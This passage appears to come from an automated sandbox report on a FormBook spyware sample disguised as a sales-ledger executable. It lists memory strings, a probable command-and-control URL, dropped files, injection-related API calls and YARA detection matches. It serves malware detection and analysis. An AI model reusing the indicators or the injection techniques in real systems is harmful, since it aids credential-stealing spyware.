                  Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehpLMEM
                  Source: cmmon32.exe, 00000020.00000003.386291684.00000000030DF000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehpc
                  Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp, cmmon32.exe, 00000020.00000003.390090022.00000000030FD000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
                  Source: cmmon32.exe, 00000020.00000003.386291684.00000000030DF000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp.
                  Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpLMEMh
                  Source: cmmon32.exe, 00000020.00000003.386291684.00000000030DF000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpj
                  Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/ocid=iehp
                  Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/ocid=iehp
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.324077435.0000000007520000.00000004.00000001.sdmpString found in binary or memory: http://www.newtonsoft.com/jsonschema
                  Source: AdvancedRun.exe, AdvancedRun.exe, 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000015.00000000.299126160.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.0.drString found in binary or memory: http://www.nirsoft.net/
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                  Source: explorer.exe, 00000019.00000002.497484764.00000000061E3000.00000040.00000001.sdmp, cmmon32.exe, 00000020.00000002.484792584.0000000005349000.00000004.00000001.sdmpString found in binary or memory: http://www.seniorlivingcaelderly.com
                  Source: explorer.exe, 00000019.00000002.497484764.00000000061E3000.00000040.00000001.sdmp, cmmon32.exe, 00000020.00000002.484792584.0000000005349000.00000004.00000001.sdmpString found in binary or memory: http://www.seniorlivingcaelderly.com/suod/
                  Source: explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                  Source: powershell.exe, 00000016.00000003.393538645.0000000007FF4000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 00000016.00000003.399833270.0000000005A8D000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.drString found in binary or memory: https://sectigo.com/CPS0C
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.drString found in binary or memory: https://sectigo.com/CPS0D
                  Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp, cmmon32.exe, 00000020.00000003.386291684.00000000030DF000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/
                  Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/4
                  Source: cmmon32.exe, 00000020.00000003.386291684.00000000030DF000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/5
                  Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
                  Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0
                  Source: cmmon32.exe, 00000020.00000003.386291684.00000000030DF000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=05

                  E-Banking Fraud:

                  Yara detected FormBook

                  System Summary:

                  Detected FormBook malware
                  Source: C:\Windows\SysWOW64\cmmon32.exe; Dropped file: C:\Users\user\AppData\Roaming\28L0N9-0\28Llogri.ini
                  Source: C:\Windows\SysWOW64\cmmon32.exe; Dropped file: C:\Users\user\AppData\Roaming\28L0N9-0\28Llogrv.ini
                  Malicious sample detected (through community Yara rule)
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0041A070 NtClose,24_2_0041A070
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0041A120 NtAllocateVirtualMemory,24_2_0041A120
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_00419F40 NtCreateFile,24_2_00419F40
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_00419FF0 NtReadFile,24_2_00419FF0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0041A06C NtClose,24_2_0041A06C
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0041A11A NtAllocateVirtualMemory,24_2_0041A11A
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01239910 NtAdjustPrivilegesToken,LdrInitializeThunk,24_2_01239910
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012399A0 NtCreateSection,LdrInitializeThunk,24_2_012399A0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01239860 NtQuerySystemInformation,LdrInitializeThunk,24_2_01239860
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01239840 NtDelayExecution,LdrInitializeThunk,24_2_01239840
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012398F0 NtReadVirtualMemory,LdrInitializeThunk,24_2_012398F0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01239A20 NtResumeThread,LdrInitializeThunk,24_2_01239A20
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01239A00 NtProtectVirtualMemory,LdrInitializeThunk,24_2_01239A00
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01239A50 NtCreateFile,LdrInitializeThunk,24_2_01239A50
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01239540 NtReadFile,LdrInitializeThunk,24_2_01239540
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012395D0 NtClose,LdrInitializeThunk,24_2_012395D0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01239710 NtQueryInformationToken,LdrInitializeThunk,24_2_01239710
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012397A0 NtUnmapViewOfSection,LdrInitializeThunk,24_2_012397A0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01239780 NtMapViewOfSection,LdrInitializeThunk,24_2_01239780
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01239660 NtAllocateVirtualMemory,LdrInitializeThunk,24_2_01239660
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012396E0 NtFreeVirtualMemory,LdrInitializeThunk,24_2_012396E0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01239950 NtQueueApcThread,24_2_01239950
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012399D0 NtCreateProcessEx,24_2_012399D0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01239820 NtEnumerateKey,24_2_01239820
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0123B040 NtSuspendThread,24_2_0123B040
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012398A0 NtWriteVirtualMemory,24_2_012398A0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01239B00 NtSetValueKey,24_2_01239B00
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0123A3B0 NtGetContextThread,24_2_0123A3B0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01239A10 NtQuerySection,24_2_01239A10
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01239A80 NtOpenDirectoryObject,24_2_01239A80
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01239520 NtWaitForSingleObject,24_2_01239520
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0123AD30 NtSetContextThread,24_2_0123AD30
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01239560 NtWriteFile,24_2_01239560
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012395F0 NtQueryInformationFile,24_2_012395F0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01239730 NtQueryVirtualMemory,24_2_01239730
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0123A710 NtOpenProcessToken,24_2_0123A710
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01239760 NtOpenProcess,24_2_01239760
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0123A770 NtOpenThread,24_2_0123A770
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01239770 NtSetInformationFile,24_2_01239770
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01239FE0 NtCreateMutant,24_2_01239FE0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01239610 NtEnumerateValueKey,24_2_01239610
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01239670 NtQueryInformationProcess,24_2_01239670
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01239650 NtQueryValueKey,24_2_01239650
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012396D0 NtCreateKey,24_2_012396D0
                  Source: C:\Windows\explorer.exeCode function: 25_2_061C5A72 NtCreateFile,NtReadFile,NtClose,25_2_061C5A72
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D095D0 NtClose,LdrInitializeThunk,32_2_04D095D0
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D09540 NtReadFile,LdrInitializeThunk,32_2_04D09540
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D09560 NtWriteFile,LdrInitializeThunk,32_2_04D09560
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D096D0 NtCreateKey,LdrInitializeThunk,32_2_04D096D0
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D096E0 NtFreeVirtualMemory,LdrInitializeThunk,32_2_04D096E0
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D09650 NtQueryValueKey,LdrInitializeThunk,32_2_04D09650
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D09660 NtAllocateVirtualMemory,LdrInitializeThunk,32_2_04D09660
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D09610 NtEnumerateValueKey,LdrInitializeThunk,32_2_04D09610
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D09FE0 NtCreateMutant,LdrInitializeThunk,32_2_04D09FE0
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D09780 NtMapViewOfSection,LdrInitializeThunk,32_2_04D09780
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D09770 NtSetInformationFile,LdrInitializeThunk,32_2_04D09770
                  Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09710 NtQueryInformationToken,LdrInitializeThunk,32_2_04D09710
                  Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09840 NtDelayExecution,LdrInitializeThunk,32_2_04D09840
                  Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09860 NtQuerySystemInformation,LdrInitializeThunk,32_2_04D09860
                  Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D099A0 NtCreateSection,LdrInitializeThunk,32_2_04D099A0
                  Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09910 NtAdjustPrivilegesToken,LdrInitializeThunk,32_2_04D09910
                  Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09A50 NtCreateFile,LdrInitializeThunk,32_2_04D09A50
                  Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D095F0 NtQueryInformationFile,32_2_04D095F0
                  Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D0AD30 NtSetContextThread,32_2_04D0AD30
                  Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09520 NtWaitForSingleObject,32_2_04D09520
                  Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09670 NtQueryInformationProcess,32_2_04D09670
                  Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D097A0 NtUnmapViewOfSection,32_2_04D097A0
                  Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D0A770 NtOpenThread,32_2_04D0A770
                  Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09760 NtOpenProcess,32_2_04D09760
                  Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D0A710 NtOpenProcessToken,32_2_04D0A710
                  Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09730 NtQueryVirtualMemory,32_2_04D09730
                  Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D098F0 NtReadVirtualMemory,32_2_04D098F0
                  Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D098A0 NtWriteVirtualMemory,32_2_04D098A0
                  Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D0B040 NtSuspendThread,32_2_04D0B040
                  Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09820 NtEnumerateKey,32_2_04D09820
                  Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D099D0 NtCreateProcessEx,32_2_04D099D0
                  Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09950 NtQueueApcThread,32_2_04D09950
                  Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09A80 NtOpenDirectoryObject,32_2_04D09A80
                  Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09A10 NtQuerySection,32_2_04D09A10
                  Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09A00 NtProtectVirtualMemory,32_2_04D09A00
                  Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09A20 NtResumeThread,32_2_04D09A20
                  Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D0A3B0 NtGetContextThread,32_2_04D0A3B0
                  Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09B00 NtSetValueKey,32_2_04D09B00
                  Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_02B2A070 NtClose,32_2_02B2A070
                  Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_02B2A120 NtAllocateVirtualMemory,32_2_02B2A120
                  Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_02B29FF0 NtReadFile,32_2_02B29FF0
                  Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_02B29F40 NtCreateFile,32_2_02B29F40
                  Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_02B2A06C NtClose,32_2_02B2A06C
                  Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_02B2A11A NtAllocateVirtualMemory,32_2_02B2A11A
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Code function: String function: 0040B550 appears 50 times
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: String function: 011FB150 appears 48 times
                  Source: C:\Windows\SysWOW64\cmmon32.exe Code function: String function: 04CCB150 appears 66 times
                  Source: Require your Sales Ledger from 01-April-2020.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: AdvancedRun.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: Require your Sales Ledger from 01-April-2020.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.314971887.00000000029BF000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameAdvancedRun.exe8 vs Require your Sales Ledger from 01-April-2020.exe
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.324334005.00000000076A0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameSycdovrq.dll" vs Require your Sales Ledger from 01-April-2020.exe
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.324077435.0000000007520000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs Require your Sales Ledger from 01-April-2020.exe
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.313244216.0000000000598000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameBogxyjdq.exeH vs Require your Sales Ledger from 01-April-2020.exe
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp Binary or memory string: ,@shell32.dllSHGetSpecialFolderPathWshlwapi.dllSHAutoComplete%2.2X%2.2X%2.2X&lt;&gt;&quot;&deg;&amp;<br><font size="%d" color="#%s"><b></b>\StringFileInfo\\VarFileInfo\Translation%4.4X%4.4X040904E4ProductNameFileDescriptionFileVersionProductVersionCompanyNameInternalNameLegalCopyrightOriginalFileNameRSDSu vs Require your Sales Ledger from 01-April-2020.exe
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.323803137.00000000074B0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemscorrc.dllT vs Require your Sales Ledger from 01-April-2020.exe
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000018.00000000.311950591.00000000007A8000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameBogxyjdq.exeH vs Require your Sales Ledger from 01-April-2020.exe
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000018.00000002.375859659.000000000147F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Require your Sales Ledger from 01-April-2020.exe
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000018.00000002.378517009.0000000001659000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameCMMON32.exe` vs Require your Sales Ledger from 01-April-2020.exe
                  Source: Require your Sales Ledger from 01-April-2020.exe Binary or memory string: OriginalFilenameBogxyjdq.exeH vs Require your Sales Ledger from 01-April-2020.exe
                  Source: Require your Sales Ledger from 01-April-2020.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                  Source: 00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                  Source: 00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000018.00000002.373557469.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                  Source: 00000018.00000002.373557469.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000020.00000002.478213740.0000000002F10000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                  Source: 00000020.00000002.478213740.0000000002F10000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                  Source: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                  Source: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000000.00000002.315244915.0000000003959000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                  Source: 00000000.00000002.315244915.0000000003959000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000000.00000003.310361553.0000000003B6B000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                  Source: 00000000.00000003.310361553.0000000003B6B000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                  Source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                  Source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                  Source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                  Source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                  Source: Require your Sales Ledger from 01-April-2020.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: Require your Sales Ledger from 01-April-2020.exe.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@18/14@2/1
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Code function: 9_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,9_2_00408FC9
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Code function: 13_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,13_2_00408FC9
